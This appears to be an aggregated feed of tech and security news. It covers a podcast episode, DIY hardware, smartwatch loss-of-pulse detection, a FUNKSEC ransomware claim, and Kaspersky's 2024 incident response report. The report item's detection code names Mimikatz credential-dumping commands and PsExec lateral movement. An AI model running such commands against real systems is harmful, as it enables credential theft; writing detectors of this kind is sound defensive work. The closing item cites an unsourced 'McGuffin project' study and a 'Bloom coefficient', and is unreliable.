
FLOSS Weekly Episode 824: Gratuitous Navel Gazing


This week, Jonathan Bennett chats with Doc Searls about SCaLE and Personal AI! What’s the vision of an AI that consumers run themselves, what form factor might that take, and how do we get there?



Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.


Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/03/12/floss-…


FlyingCam is a Sweet DIY Webcam on a Stick


Imagine you want to monitor a pot on the stove to see if it’s boiling over for just a few minutes, but you don’t want to have a dedicated permanent IP webcam solution in your kitchen. [Sebastian Duell]’s FlyingCam hijacks an IKEA lamp gooseneck to become something you never knew you needed: a wireless camera for short-term random remote observation. It’s a beautiful combination of 3D printing and commercial device re-use, and when paired with his DIY wireless screen, it’s a complete solution.

The guts of this project aren’t critical, or expensive. It’s built around one of those ESP32 single-board webcams, with an added fan, battery pack, antenna, and a power switch. You turn it on, and the AP in the ESP32 fires up, or optionally connects to your network. Point the camera at your target and you’re set, at least if you want to sit by your computer. But [Sebastian] also designed a nice simple remote screen, so you can keep tabs on your spaghetti wherever you roam around the house.

We love the attention to keeping the design simple here, both in form and in function. It’s a one-task device, so it’s important that it be extremely easy to use, and it’s hard to beat just pointing the thing and turning on a switch. And it doesn’t hurt that it’s good looking to boot.

IKEA stuff is cheap and cheerful, but often it’s missing just that one functionality that we want. What good is an air-quality sensor without MQTT logging capability, for instance? Or a standing desk that can’t remember set heights? Get hacking!


hackaday.com/2025/03/12/flying…


Pixel Watch 3’s Loss of Pulse Detection: the Algorithms That Tell Someone is Dying


More and more of the ‘smart’ gadgets like watches and phones that we carry around with us these days come with features that we’d not care to ever need. Since these are devices that we strap onto our wrists and generally carry in close proximity to our bodies, they can use their sensors to make an estimation of whether said body is possibly in the process of expiring. This can be due to a severe kinetic event like a car crash, or something more subtle like the cessation of the beating of one’s heart.

There is a fairly new Loss of Pulse Detection (LoPD) feature in Google’s Pixel Watch 3 that recently got US FDA approval, allowing it to be made available in the US after previously becoming available in over a dozen European countries following its announcement in August of 2024. This opt-in feature regularly polls whether it can detect the user’s pulse. If not found, it cascades down a few steps before calling emergency services.

The pertinent question here is always whether it is truly detecting a crisis event, as nobody wants to regularly apologize for a false alert to the overworked person staffing the 911 or equivalent emergency line. So how do you reliably determine that your smart watch or phone should dial emergencies forthwith?

Budget Medical Devices


One of the amazing things about technological progress is that sensors and processing capabilities that were rather exotic a few decades ago are now included in just about any smart device you can strap on your wrist. This includes motion sensors and pulse and oxygen-level meters, making these devices in theory capable of acting like ambulatory cardiac monitors and similar medical devices that monitor health parameters and respond to emergencies.

While for a long time the gold standard for longer-term heart function monitoring outside a hospital setting was a portable electrocardiogram (ECG) recorder, wrist-worn monitoring devices based on photoplethysmography (PPG) have recently proven themselves acceptable substitutes. In a 2018 study by Francesco Sartor et al. in BMC Sports Science, Medicine and Rehabilitation the researchers found that the wrist-worn PPG was not as accurate as the ECG-based chest strap monitor, but came close enough to be practical.

The difference is such that for applications where precision actually matters the chest-strap ECG is still the optimal choice, but wrist-worn PPG devices, as integrated into many fitness bands and smart watches, are an acceptable substitute for tasks such as monitoring heart rate for signs of atrial fibrillation. A 2022 study by Christopher Ford et al. in JACC: Clinical Electrophysiology examined two smart watches (Apple Watch 4, KardiaBand) for this purpose, finding their accuracy to be 91% and 87% respectively.

Together with additional sensors like the commonly integrated motion sensor, these devices seem accurate enough to at least determine whether the person wearing them is suffering a cardiac event that requires immediate intervention.

Health Check


The idea of an automatic emergency call isn’t new, with for example the EU making such a system (called eCall) mandatory in new cars since 2018. The idea is that when a serious collision is detected, emergency services are contacted and provided with location and sensor data. Google added its Car Crash Detection feature to the Pixel 3 smartphone in 2019, and Apple added Crash Detection to its Apple Watch and iPhones in 2022. These use sensor data from gyroscopes, GPS, microphones, and accelerometers to determine whether a crash just occurred.

What users of these devices discovered, however, was that activities such as going on a rollercoaster ride could activate this feature, as could snowmobile rides, skiing, and similar activities. In response, Apple had to adjust the algorithms on these devices to reduce the number of false positives. Despite this, rescue workers in e.g. Canada are still reporting a large number of false positives. One reason cited is that although there is a time-out, with an audible alarm, before the emergency line is called, the alarm can be hard to hear when you’re on a snowmobile.

As it turns out, defining what seems to us like a pretty clear event is much trickier than it looks when you’re limited to just this handful of sensors. After all, what is the difference between the sensor data from a rollercoaster ride, a car crash, dropping one’s phone or smart watch onto a concrete floor, or forgetting said phone on the roof of the car?

In this context, the idea of taking a simple activity like measuring heart rate and pulse, and extrapolating from these that an emergency has occurred if they cease, is likewise fraught with pitfalls.

Merging Data


How do you know as a human being that someone has just suffered cardiac arrest? You confirm that they don’t have a noticeable (carotid) pulse, and the reason why you checked is because they clearly collapsed. This is when you’d pull out your phone and dial emergency services. The LoPD feature that Google has introduced has to do effectively exactly these steps, except that it starts from the loss of pulse (LoP) rather than from seeing someone pass out and collapse to the ground.

Thus the tricky part is establishing whether said collapse has occurred, not whether the pulse has been lost. After all, the user may have simply taken the watch off. According to Google, to verify their algorithms they hired stunt actors to simulate LoP using a tourniquet (cutting off blood flow) and to simulate the kind of fall a person suffering cardiac arrest would have.

On the sensor side they use the heart rate monitor (PPG sensor), which initially uses green light to check for a pulse, but can switch to infrared and red light when a LoP condition is triggered. Simultaneously the motion sensor data is consulted, with a lack of motion taken as a sign that we’re dealing with a genuine LoP. This starts an auditory alarm and a visual countdown on the screen before emergency services are contacted with an automated message plus the user’s location.

The response to this merged sensor data was calibrated against clinical data on e.g. cardiac events before the result was trialed with said stunt actors and volunteers. An article on this research was also published in Nature (paywalled, gift article), detailing the algorithm and the way they tested its effectiveness. In the paper the authors note one false positive event and subsequent emergency call across 21.67 user-years across two studies, with a sensitivity of 67.23%.
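As an added illustration of the cascade just described (this is example code written for this page, not Google’s algorithm and not anything from the Nature paper), the following Python sketch models the stages as a small state machine: a missed pulse on the green channel, a re-check on the infrared/red channels, a stillness check from the motion sensor, a cancellable countdown, and only then the call. The sensor readings, the thresholds (`still_seconds`, `countdown_seconds`, `motion_threshold`) and the wear-detection flag are all assumptions made for the example.

```python
from dataclasses import dataclass
from enum import Enum


class State(Enum):
    MONITORING = "monitoring"        # routine green-light PPG polling
    LOP_SUSPECTED = "lop_suspected"  # no pulse on green; IR/red or motion may clear it
    COUNTDOWN = "countdown"          # alarm sounding, wearer can still cancel
    CALL_PLACED = "call_placed"      # emergency services contacted


@dataclass(frozen=True)
class Sample:
    """One second of sensor readings. Constructed for the example, not real watch data."""
    green_pulse: bool    # pulse visible on the green-light PPG channel
    ir_red_pulse: bool   # pulse visible on the infrared/red PPG channels
    motion: float        # accelerometer magnitude, arbitrary units
    on_wrist: bool       # wear-detection result


class LossOfPulseMonitor:
    """Hypothetical LoPD cascade: pulse check -> deeper PPG check -> stillness -> countdown -> call."""

    def __init__(self, still_seconds=10, countdown_seconds=20, motion_threshold=0.05):
        self.still_seconds = still_seconds          # stillness required before the alarm starts
        self.countdown_seconds = countdown_seconds  # alarm duration before the call is placed
        self.motion_threshold = motion_threshold
        self._reset()

    def _reset(self):
        self.state = State.MONITORING
        self.still_for = 0
        self.countdown_left = 0

    def step(self, s: Sample) -> State:
        if self.state is State.CALL_PLACED:
            return self.state                       # terminal for this example
        if not s.on_wrist:
            self._reset()                           # watch taken off: no pulse is expected
            return self.state
        moving = s.motion > self.motion_threshold
        if self.state is State.MONITORING:
            if not s.green_pulse and not s.ir_red_pulse:
                self.state = State.LOP_SUSPECTED    # green lost it and IR/red could not recover it
                self.still_for = 0
        elif self.state is State.LOP_SUSPECTED:
            if s.ir_red_pulse or moving:
                self._reset()                       # pulse found again, or wearer is active
            else:
                self.still_for += 1
                if self.still_for >= self.still_seconds:
                    self.state = State.COUNTDOWN
                    self.countdown_left = self.countdown_seconds
        elif self.state is State.COUNTDOWN:
            if s.ir_red_pulse or moving:
                self._reset()                       # wearer responded to the alarm
            else:
                self.countdown_left -= 1
                if self.countdown_left <= 0:
                    self.state = State.CALL_PLACED
        return self.state


def trace(samples, still_seconds=3, countdown_seconds=2):
    """Run a sample sequence and return the state name after every second."""
    monitor = LossOfPulseMonitor(still_seconds, countdown_seconds)
    return [monitor.step(s).value for s in samples]


def final_state(samples, still_seconds=3, countdown_seconds=2) -> State:
    return State(trace(samples, still_seconds, countdown_seconds)[-1])


# Constructed one-second readings.
NORMAL = Sample(True, True, 0.30, True)
STILL_NO_PULSE = Sample(False, False, 0.00, True)     # collapse signature
MOVING_NO_PULSE = Sample(False, False, 0.40, True)    # wearer moving, so not a collapse
GREEN_DROPOUT = Sample(False, True, 0.00, True)       # green channel lost, IR/red still sees it
OFF_WRIST = Sample(False, False, 0.00, False)

SCENARIOS = {
    "collapse": [NORMAL] * 2 + [STILL_NO_PULSE] * 6,
    "watch_removed": [NORMAL] * 2 + [OFF_WRIST] * 6,
    "green_dropout": [NORMAL] * 2 + [GREEN_DROPOUT] * 6,
    "user_cancels": [NORMAL] * 2 + [STILL_NO_PULSE] * 4 + [MOVING_NO_PULSE] + [NORMAL] * 2,
}

if __name__ == "__main__":
    for name, samples in SCENARIOS.items():
        print(f"{name:14s} {' > '.join(trace(samples))}")
```

Running the module prints one state trace per scenario. The "watch removed" and "green dropout" cases never reach the countdown, which is the false-positive behaviour the text says the design has to avoid, while "user cancels" shows the alarm being aborted by motion after it has already started.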

A Matter Of Time

Chain of survival in case of cardiac arrest. (Credit: European Resuscitation Council)
In the case of cardiac arrest, time is of the absolute essence. This is also clearly noted in the Google paper on the LoPD feature, which notes that ideally there is a witness on-site who can immediately begin CPR or (ideally) fetch a nearby automated external defibrillator (AED). Unfortunately, in most cases of cardiac arrest the event initially goes unnoticed. The LoPD feature on a smart watch would thus be for cases where nobody is around to notice the emergency and respond to it. Although it isn’t explicitly mentioned, it seems that the watch can also detect whether it’s being worn or not, which should prevent false positives there.

With over half a million US citizens alone suffering cardiac arrest each year, and over half of these occurring outside of a hospital setting, this could potentially save thousands of lives each year. Following cardiac arrest, and in the absence of resuscitation, the lack of blood (and oxygen) being circulated means that within minutes organs begin to suffer harmful effects, depending on their oxygen requirements. The brain is generally the first to suffer ill effects, which is why the prompt application of CPR is so crucial.

Because of the intense urgency following a major cardiac event like this, the practical use of this LoPD feature will be highly dependent on the location where the emergency occurs. In the case of e.g. someone collapsing while alone at home in their city house or apartment, this could conceivably save their life if emergency services can arrive within minutes. Even faster and more useful in less urban settings would probably be having your smart device notify nearby people who can then perform CPR while calling 911 or equivalent.

That said, perhaps the real killer feature that’s missing here is an integrated AED in smartphones since everyone has one of those things on them at all times, or even smart watches that can automatically perform defibrillation while also notifying emergency services.


hackaday.com/2025/03/12/pixel-…


FUNKSEC claims a cyber attack on the University of Modena and Reggio Emilia. Read the details


Today the FUNKSEC cybercriminal gang claimed, on its own Data Leak Site (DLS), a cyber attack on the Italian University of Modena and Reggio Emilia. In the post published on their blog, present on the clear web (and in the underground), the cybercriminals report that the gang holds 1 GB of data exfiltrated from the organization’s IT infrastructure. They threaten to publish it in 7 days and 11 hours.

At this time we cannot confirm the accuracy of the report, since the organization has not yet issued any official press release on its website about the incident. This article should therefore be treated as an “intelligence source”.

To attest that access to the IT infrastructure was successful, the cybercriminals post a series of documents (samples) belonging to the organization.

This way of operating, as RHC readers know, generally happens when no agreement has yet been reached on payment of the ransom demanded by the cybercriminals. By threatening to publish the data in their possession, the criminals increase the pressure on the breached organization, hoping that payment will come faster.

Keep in mind that this cybergang, unlike the others, has a website exposed on the public internet, so it is reachable on the clear web by anyone and indexable by search engines.

Since (as we will see below) FUNKSEC has often recycled information from previous data leaks or hacktivist activity, it remains to be seen how well founded this claim is, and it must therefore be treated as “intelligence information”.

As is our custom, we always leave room for a statement from the organization should it wish to give us updates on the matter. We will be glad to publish such information in a dedicated article giving the issue prominence.

RHC will monitor developments in order to publish further news on the blog should there be substantial updates. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower’s encrypted email.

The Funk Sec cybergang


The FunkSec ransomware group first emerged publicly in late 2024 (as CheckPoint researchers report) and quickly gained notoriety by publishing more than 85 claimed victims, more than any other ransomware group in the month of December alone. Presenting itself as a new Ransomware-as-a-Service (RaaS) operation, FunkSec appears to have no known connections with previously identified ransomware gangs, and little information is currently available about its origins or operations.

The group’s activity suggests that the impressive numbers of published victims may mask a more modest reality, both in terms of actual victims and of the group’s level of expertise. Most of FunkSec’s core operations are probably carried out by inexperienced actors. Moreover, it is hard to verify the authenticity of the leaked information, since the group’s main goal seems to be gaining visibility and recognition. Evidence suggests that in some cases the leaked information was recycled from previous leaks connected to hacktivist activity, raising doubts about its authenticity.

FunkSec has ties to the hacktivist world and uses public tools, including a custom ransomware probably developed by a relatively inexperienced malware author based in Algeria. The findings indicate that the development of the group’s tools, including the ransomware, was probably assisted by artificial intelligence, which may have contributed to their rapid iteration despite the author’s apparent lack of technical expertise.

This case highlights the increasingly blurred line between hacktivism and cybercrime, underscoring the challenges of telling one from the other. Whether such a distinction really exists, or whether the operators are aware of it or interested in defining it, remains uncertain. More importantly, it also calls into question the reliability of current methods for assessing the risk posed by ransomware groups, especially when those assessments rely on the public claims of the actors themselves.

The University of Modena and Reggio Emilia


From its origins dating back to 1175, the University has been the hub of scientific, cultural and social life and, albeit with mixed fortunes tied to the local political changes that followed one another over the centuries, has progressively expanded to become a multidisciplinary, active and dynamic university.

With around 30,000 students enrolled in first-, second- and third-cycle degree programmes and over 1,400 staff among teaching, research and technical-administrative personnel, Unimore is one of the large universities; it is organized as a network of campuses (Modena and Reggio Emilia) and consists of 13 Departments and 2 Faculties/Schools, joined by the cities of Mantova and Carpi (accredited sites for degree courses), as well as interdepartmental centres located across the two provinces of Modena and Reggio Emilia, where teaching, research, third-mission activities and the related support and technology-transfer services take place.

What ransomware as a service (RaaS) is


Ransomware is a type of malware that is introduced into an organization in order to encrypt data and make systems unavailable. Once the data is encrypted, the criminals demand that the victim pay a ransom, in cryptocurrency, to decrypt it.

If the victim refuses to pay, the criminals proceed to double extortion: the threat of publishing sensitive data previously exfiltrated from the victim’s IT infrastructure.

To better understand how criminal organizations operate within the ransomware-as-a-service (RaaS) business, we refer you to these articles:


How to protect against ransomware


Ransomware infections can be devastating for an organization, and data recovery can be a difficult and laborious process that requires highly specialized operators for a reliable result; where no backup of the data exists, recovery has in many cases failed.

Users and administrators are therefore advised to adopt preventive security measures to protect their networks from ransomware infections. In order of complexity, these are:

  • Train staff through awareness courses;
  • Use a backup and recovery plan for all critical information. Perform and test regular backups to limit the impact of data or system loss and to speed up the recovery process. Bear in mind that network-connected backups can also be affected by ransomware; critical backups must be isolated from the network for optimal protection;
  • Keep the operating system and all software up to date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Ensuring they are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker;
  • Keep antivirus software up to date and scan all software downloaded from the internet before running it;
  • Restrict users’ ability (permissions) to install and run unwanted software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges can prevent malware from running or limit its ability to spread across the network;
  • Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, the embedded code will run the malware on the computer;
  • Do not follow unsolicited web links in emails;
  • Never expose Remote Desktop Protocol (RDP) connections directly to the internet. Where access from the internet is needed, it must be mediated by a VPN;
  • Deploy Intrusion Prevention System (IPS) and Web Application Firewall (WAF) systems as perimeter protection in front of internet-facing services;
  • Deploy a natively automated XDR security platform, ideally supported by a 24/7 MDR service, to achieve complete and effective protection and visibility across endpoints, users, networks and applications, regardless of resources, team size or skills, while also providing automated detection, correlation, analysis and response.

Both individuals and organizations are discouraged from paying the ransom, since even after payment the cyber gangs may not release the decryption key, or the recovery operations may suffer errors and inconsistencies.

Cybersecurity is a serious matter and today can deeply undermine a company’s business.

Today it is necessary to change mindset immediately and think of cybersecurity as an integral part of the business, rather than thinking about it only after a cybersecurity incident has occurred.

The article FUNKSEC claims a cyber attack on the University of Modena and Reggio Emilia. Read the details originally appeared on il blog della sicurezza informatica.


Some Useful Notes On The 6805-EC10 Addressable RGB LED


LEDs are getting smaller and smaller, and the newest generations of indexable RGB LEDs are even fiddlier to use than their already diminutive predecessors. [Alex Lorman] has written some notes about the minuscule SK6805-EC10 series of LEDs, which may be helpful to those wanting to learn how to deal with these in a more controlled manner.

Most hardware types will be very familiar with the 5050-sized devices, sold as Neopixels in some circles, which are so-named due to being physically 5.0 mm x 5.0 mm in the horizontal dimensions. Many LEDs are specified by this simple width by depth manner. As for addressable RGB LEDs (although not all addressable LEDs are RGB, there are many weird and wonderful combinations out there!) the next most common standard size down the scale is the 2020, also known as the ‘Dotstar.’ These are small enough to present a real soldering challenge, and getting a good placement result needs some real skills.

[Alex] wanted to use the even smaller EC10 or 1111 devices, which measure a staggering 1.1 mm x 1.1 mm! Adafruit’s product page mentions that these are not intended for hand soldering, but we bet you want to try! Anyway, [Alex] has created a KiCAD footprint and a handy test PCB for characterizing and getting used to handling these little suckers, which may help someone on their way. They note that hot air reflow soldering needs low temperature paste (this scribe recommends using MG Chemicals branded T3 Sn42Bi57Ag1 paste in this application) and a very low heat to avoid cracking the cases open. A low air flow rate, to prevent blowing them all over the desk, would also be smart. Perhaps these are more suited to a hot plate or a proper convection oven?

As a bonus, [Alex] has previously worked with the slightly larger SK6805-1515 device, with some good extra notes around an interesting nonlinearity effect and the required gamma correction to get good colour perception. We’ll leave that to you readers to dig into. Happy soldering!

We’ve not yet seen many projects using these 1111 LEDs, but here’s one we dug up using the larger 1515 unit.


hackaday.com/2025/03/12/some-u…


I2C Sniffing Comes to the Bus Pirate 5


While the Bus Pirate 5 is an impressive piece of hardware, the software is arguably where the project really shines. Creator [Ian Lesnet] and several members of the community are constantly working to add new features and capabilities to the hardware hacking multi-tool, to the point that if your firmware is more than a few days old there’s an excellent chance there’s a fresher build available for you to try out.

One of the biggest additions from the last week or so of development has been the I2C sniffer — a valuable tool for troubleshooting or reverse engineering devices using the popular communications protocol. [Ian] has posted a brief demo video of it in action.

It’s actually a capability that was available in the “classic” versions of the Bus Pirate, but rather than porting the feature over from the old firmware, [Ian] decided to fold the MIT licensed pico_i2c_sniffer from [Juan Schiavoni] into the new codebase. Thanks to the RP2040’s PIO, the sniffer works at up to 500 kHz, significantly outperforming its predecessor.

Admittedly, I2C sniffing isn’t anything you couldn’t do with a cheap logic analyzer. But that means dealing with captures and making sure the protocol decoder is set up properly, among other bits of software tedium. In comparison, once you start the sniffer program on the Bus Pirate 5, I2C data will be dumped out to the terminal in real-time for as long as you care to see it. For reverse engineering, it’s also very easy to move quickly from sniffing I2C packets to replaying or modifying them within the Bus Pirate’s interface.
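To make the decoding step concrete, here is a bit-level I2C decoder written as an added example for this page; it is not the Bus Pirate firmware nor [Juan Schiavoni]’s pico_i2c_sniffer, and it runs on plain Python lists rather than on the RP2040’s PIO. Input is a list of (SCL, SDA) logic-level samples; the decoder finds START and STOP conditions (SDA changing while SCL is high), samples SDA on each SCL rising edge, and splits the bits into address, direction, data bytes and ACK flags. The `encode_transaction` helper exists only to construct a test waveform, and the address 0x50 and the data bytes are made up.

```python
IDLE = (1, 1)  # (scl, sda) with both lines released by the pull-ups


def _clock_bit(sda):
    """Three samples for one bit: SDA set while SCL low, SCL high, SCL low again."""
    return [(0, sda), (1, sda), (0, sda)]


def encode_transaction(address, write, data, acks=None):
    """Construct the sampled waveform of one I2C transaction (test input only, not a capture).

    address: 7-bit target address; data: bytes after the address byte;
    acks: per-byte ACK flags for the address + data bytes (default: all ACKed).
    """
    payload = [(address << 1) | (0 if write else 1)] + list(data)
    if acks is None:
        acks = [True] * len(payload)
    samples = [IDLE, (1, 0), (0, 0)]            # START: SDA falls while SCL is high
    for byte, ack in zip(payload, acks):
        for i in range(7, -1, -1):              # MSB first
            samples += _clock_bit((byte >> i) & 1)
        samples += _clock_bit(0 if ack else 1)  # 9th clock: receiver pulls SDA low to ACK
    samples += [(0, 0), (1, 0), (1, 1)]         # STOP: SDA rises while SCL is high
    return samples


def decode(samples):
    """Decode a list of (scl, sda) samples into frames: address, direction, data, ACK flags."""
    frames, frame, bits = [], None, []
    if not samples:
        return frames
    prev_scl, prev_sda = samples[0]
    for scl, sda in samples[1:]:
        if scl and prev_scl:                    # SDA changed while SCL high: START or STOP
            if prev_sda and not sda:            # START (also a repeated START mid-transaction)
                if frame is not None:
                    frames.append(frame)
                frame = {"address": None, "rw": None, "data": [], "acks": []}
                bits = []
            elif not prev_sda and sda:          # STOP
                if frame is not None:
                    frames.append(frame)
                frame, bits = None, []          # partial bits before STOP are discarded
        elif scl and not prev_scl and frame is not None:   # SCL rising edge: sample SDA
            bits.append(sda)
            if len(bits) == 9:                  # 8 data bits + ACK bit
                value = 0
                for b in bits[:8]:
                    value = (value << 1) | b
                if frame["address"] is None:    # first byte carries address and R/W
                    frame["address"] = value >> 1
                    frame["rw"] = "R" if value & 1 else "W"
                else:
                    frame["data"].append(value)
                frame["acks"].append(bits[8] == 0)
                bits = []
        prev_scl, prev_sda = scl, sda
    return frames


def format_frame(frame):
    """One line per transaction, terminal-dump style; '*' marks a byte that was NACKed."""
    if frame["address"] is None:
        return "(empty frame)"
    acks = frame["acks"]
    addr = f"0x{frame['address']:02X}{'' if acks[0] else '*'}"
    data = " ".join(f"{b:02X}{'' if a else '*'}" for b, a in zip(frame["data"], acks[1:]))
    return f"{frame['rw']} {addr} {data}".rstrip()


# Constructed capture: a 2-byte write to address 0x50, then a 2-byte read ending with a NACK.
CAPTURE = (encode_transaction(0x50, True, [0x00, 0xAB])
           + [IDLE] * 4
           + encode_transaction(0x50, False, [0x12, 0x34], acks=[True, True, False]))

if __name__ == "__main__":
    for f in decode(CAPTURE):
        print(format_frame(f))
```

Run it directly to see the transactions printed one per line. A NACKed byte is marked with `*`; in a real capture that is the quickest way to tell a device that is not answering from one that is, and the partial-bits rule in `decode` is what keeps the extra SCL edge before a STOP from being misread as the start of another byte.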

If you already have a Bus Pirate 5, all you need to do is flash the latest firmware from the automated build system, and get sniffing. On the fence about picking one up? Perhaps our hands-on review will help change your mind.


hackaday.com/2025/03/12/i2c-sn…


Incident response analyst report 2024


Kaspersky provides rapid and fully informed incident response services to organizations, ensuring impact analysis and effective remediation. Our annual report shares anonymized data about the investigations carried out by the Kaspersky Global Emergency Response Team (GERT), as well as statistics and trends in targeted attacks, ransomware and adversaries’ tools that our experts observed throughout the year in real-life incidents that required both comprehensive IR unit support and consulting services aimed at assisting organizations’ in-house expert teams.

Download the full version of the report.

Regions and industries of incident response requests


In 2024, we saw the share of incident response requests rise in most of the regions, with the majority of investigations conducted in the CIS (50.6%), the Middle East (15.7%) and Europe (10.8%).

Geographic distribution of incident response requests, 2024

The distribution of IR requests by industry followed the 2023 pattern, keeping industrial (23.5%), government (16.3%) and financial (13.3%) organizations in the top three most targeted industries. However, this year, the majority of requests came from industrial enterprises, whereas the government agencies were targeted less often than in 2023. We also observe a growing tendency in incidents related to the transportation industry — the number of requests for IR services has doubled since 2023.

Distribution of organizations that requested IR assistance, by industry, 2024

Key 2024 trends and statistics


In 2024, ransomware attacks saw an increase of 8.3 p.p. from the 2023 numbers and amounted to 41.6% of incidents overall. Our GERT experts estimate that ransomware will persist as the main threat to organizations worldwide in the upcoming year, continuing the trend of the recent years, as we observe this threat holding top positions among incidents in organizations. In the majority of infections, we encountered samples of the LockBit family (43.6%), followed by Babuk (9.1%) and Phobos (5.5%). Our investigations also revealed new ransomware families, such as ShrinkLocker and Ymir. What is more, GERT experts discovered noteworthy malicious campaigns like Tusk and a set of incidents with CVE-2023-48788 exploited.

Another alarming trend identified in real incident response cases is wider use of such tools as Mimikatz (21.8%) and PsExec (20.0%). They are commonly used during post-exploitation for password extraction and lateral movement. We also observe a strengthening tendency for data leakage to be the second most common reason for an incident response request, amounting to 16.9% of all incidents, which correlates with our assumptions regarding trends in credential access techniques.

Recommendations for preventing incidents


To protect your organization against cyberthreats and minimize the damage in the case of an attack, Kaspersky GERT experts recommend:

  • Implementing a strong password policy and using multi-factor authentication
  • Removing management ports from public access
  • Adopting secure development practices to prevent insecure code from reaching production environments
  • Establishing a zero-tolerance policy for patch management, or having compensation measures in place for public-facing applications
  • Ensuring that employees maintain a high level of security awareness
  • Implementing rules to detect utilities commonly used by adversaries
  • Conducting frequent, regular compromise assessment activities
  • Employing a security tool set that includes EDR-like telemetry
  • Constantly testing the security operations team’s response times with simulated attacks
  • Prohibiting the use of any software being used within the corporate network that is known to be used by attackers
  • Regularly backing up your data
  • Working with an Incident Response Retainer partner to address incidents with fast SLAs
  • Implementing strict security programs for applications that handle personal information
  • Implementing security access control over important data using DLP
  • Continuously training your incident response team to maintain their expertise and stay up-to-date with the evolving threat landscape
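The recommendation to add rules for utilities commonly used by adversaries can be illustrated with a small detection pass over process-creation telemetry. This is an added example, not Kaspersky’s or GERT’s tooling: the events are constructed to resemble Sysmon Event ID 1 fields, and the hosts, users, paths and timestamps are placeholders. The rules flag PsExec by its own binary or the PSEXESVC service it installs on the target, and Mimikatz by binary name, by the PE OriginalFileName (which survives renaming) and by its module syntax on the command line.

```python
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Process-creation record with the fields Sysmon Event ID 1 exposes (values constructed)."""
    ts: str
    host: str
    image: str                     # full path of the new process
    command_line: str
    parent_image: str
    original_file_name: str = ""   # PE metadata; survives renaming the binary on disk
    user: str = ""


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Command-line module prefixes Mimikatz uses; any of them is a high-confidence signal.
MIMIKATZ_TOKENS = ("sekurlsa::", "lsadump::", "kerberos::", "privilege::debug")


def rule_psexec(e):
    """PsExec on the source host, or the PSEXESVC service it installs on the target."""
    return (_basename(e.image) in ("psexec.exe", "psexec64.exe", "psexesvc.exe")
            or e.original_file_name.lower() == "psexesvc.exe")


def rule_mimikatz(e):
    """Mimikatz by name, by PE original filename (renamed copies), or by module syntax."""
    cmd = e.command_line.lower()
    return (_basename(e.image) == "mimikatz.exe"
            or e.original_file_name.lower() == "mimikatz.exe"
            or any(tok in cmd for tok in MIMIKATZ_TOKENS))


RULES = {"psexec_execution": rule_psexec, "mimikatz_execution": rule_mimikatz}


def detect(events):
    """Return one alert per (event, matching rule) pair, in event order."""
    alerts = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                alerts.append({"rule": name, "ts": e.ts, "host": e.host,
                               "user": e.user, "image": e.image})
    return alerts


def summarize(alerts):
    """Count alerts per rule, the figure a report like this one would quote."""
    counts = {}
    for a in alerts:
        counts[a["rule"]] = counts.get(a["rule"], 0) + 1
    return counts


# Constructed telemetry; hosts, users, paths and times are placeholders, not real data.
SAMPLE_EVENTS = [
    ProcessEvent("2024-05-02T08:01:10Z", "ws-101", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe report.txt", r"C:\Windows\explorer.exe", "NOTEPAD.EXE", "corp\\alice"),
    ProcessEvent("2024-05-02T08:04:33Z", "srv-fs01", r"C:\Windows\PSEXESVC.exe",
                 "C:\\Windows\\PSEXESVC.exe", r"C:\Windows\System32\services.exe",
                 "psexesvc.exe", "NT AUTHORITY\\SYSTEM"),
    ProcessEvent("2024-05-02T08:05:12Z", "srv-fs01", r"C:\Users\Public\upd.exe",
                 "upd.exe", r"C:\Windows\System32\cmd.exe", "mimikatz.exe", "corp\\svc-backup"),
    ProcessEvent("2024-05-02T08:05:40Z", "srv-fs01", r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c m.exe "sekurlsa::logonpasswords" exit', r"C:\Windows\PSEXESVC.exe",
                 "Cmd.Exe", "corp\\svc-backup"),
    ProcessEvent("2024-05-02T08:10:05Z", "ws-101",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -File backup.ps1", r"C:\Windows\explorer.exe",
                 "PowerShell.EXE", "corp\\alice"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['ts']} {a['host']:9s} {a['rule']:20s} {a['user']} {a['image']}")
    print(summarize(detect(SAMPLE_EVENTS)))
```

The third sample event is the one worth noting: the binary has been renamed to `upd.exe` and its command line is bland, so only the OriginalFileName check catches it. That is why EDR-like telemetry carrying PE metadata, which the same recommendation list asks for, matters more than a filename blocklist.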

The full 2024 Incident Response Report features additional information about real-life incidents, including new threats discovered by Kaspersky experts. We also take a closer look at APT activities, providing statistics for the most prolific groups. The report includes comprehensive analysis of initial attack vectors in correlation with the MITRE ATT&CK tactics and techniques and the full list of vulnerabilities that we detected during incident response engagements.


securelist.com/kaspersky-incid…


Fake news: studio internazionale rivela che è tutta colpa dell’AI e dell’anonimato online


The first report from the analysis conducted by the McGuffin project, which involved more than 23 countries through an investigative task force coordinated with universities and specialist research centres, has confirmed an alarming fact: with the development of LLMs, the fake news alarm is more topical than ever and calls for regulatory intervention to govern the use of Artificial Intelligence and access to, and participation in, social networks. One of the factors raising the greatest concern is online anonymity, which according to the studies is closely correlated with the production and spread of fake news.

According to the data provided, the Bloom coefficient, the main international parameter used to analyse the ability of the major social networks’ systems to assess the danger of false news, gives rather alarming indicators:

  • an average value between 4 and 8 in countries where the use of social networks and LLMs is heavily restricted;
  • an average value between 15 and 16 in countries where social networks are widely used but LLMs are not;
  • an average value of 32 in countries where both social networks and LLMs are widespread, with peaks of 42 where online anonymity is guaranteed and there is no legislation on Artificial Intelligence.

